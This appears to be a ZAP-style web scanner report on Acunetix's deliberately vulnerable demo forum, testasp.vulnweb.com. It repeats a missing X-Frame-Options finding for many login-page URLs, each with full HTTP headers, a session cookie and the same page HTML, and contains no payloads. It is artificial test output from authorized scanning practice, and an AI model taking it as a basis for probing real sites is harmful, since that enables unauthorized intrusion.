<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 